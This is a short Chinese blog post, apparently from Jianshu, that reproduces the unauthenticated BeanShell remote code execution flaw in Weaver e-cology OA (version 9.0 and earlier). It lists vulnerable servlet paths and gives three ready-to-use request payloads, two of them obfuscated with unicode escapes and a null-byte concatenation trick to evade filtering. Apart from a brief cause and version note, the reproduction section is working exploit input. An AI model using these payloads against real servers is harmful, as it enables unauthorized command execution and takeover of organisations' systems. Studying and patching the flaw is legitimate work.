泛微e-cology OA 遠(yuǎn)程代碼執(zhí)行漏洞

0x00 漏洞原理

該漏洞位于 e-cology OA系統(tǒng)BeanShell組件中,并且該組件允許未授權(quán)訪問,攻擊者可通過訪問該組件執(zhí)行任意的Java代碼,導(dǎo)致遠(yuǎn)程命令執(zhí)行。

0x01影響版本

泛微 e-cology<=9.0

0x02復(fù)現(xiàn)

可能的路徑

/weaver/bsh.servlet.BshServlet
/weaveroa/bsh.servlet.BshServlet
/oa/bsh.servlet.BshServlet

payload:

bsh.script=exec("whoami");&bsh.servlet.output=raw
bsh.script=\u0065\u0078\u0065\u0063("whoami");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw
bsh.script=eval%00("ex"%2b"ec(bsh.httpServletRequest.getParameter(\\"command\\"))");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw&command=whoami
image.png
image.png

0x03參考

https://github.com/myzing00/Vulnerability-analysis/tree/master/0917/weaver-oa/CNVD-2019-32204

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時請結(jié)合常識與多方信息審慎甄別。
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡書系信息發(fā)布平臺,僅提供信息存儲服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

  • 0x01 前言 來源:個人博客 在CNVD上剛發(fā)現(xiàn)泛微OA的新漏洞,就有大佬發(fā)出漏洞細(xì)節(jié),就進(jìn)行了復(fù)現(xiàn)。 0x02...
    dylan903閱讀 1,632評論 0 0
  • 你是12年入學(xué),15年高考的人嗎? 是也好,不是也好,這中間的過程,仿佛都經(jīng)歷了1314(一生一世)。 你還記得嘛...
    南風(fēng)z閱讀 379評論 2 6
  • 我能聽到炙熱的微風(fēng)吹拂的聲響, 我能看見在藍(lán)天輕撫下扮著小丑恣意妄為著的浮云。 我能窺見獨(dú)月,灑下的一束清冷之光。...
    世荒蕪閱讀 311評論 0 1
  • 智利北部有一個叫丘恩貢果的小村子,這里西臨太平洋,北靠阿塔卡瑪沙漠。特殊的地理環(huán)境,使太平洋冷濕氣流與沙漠上...
    建行楊勇閱讀 208評論 0 0
  • 食物是影響健康最大的因素,好的食物構(gòu)筑健康的身體,錯誤的食物帶來衰老和疾病。 什么是好的食物,最適合人體的食物。 ...
    張春華閱讀 279評論 0 0

友情鏈接更多精彩內(nèi)容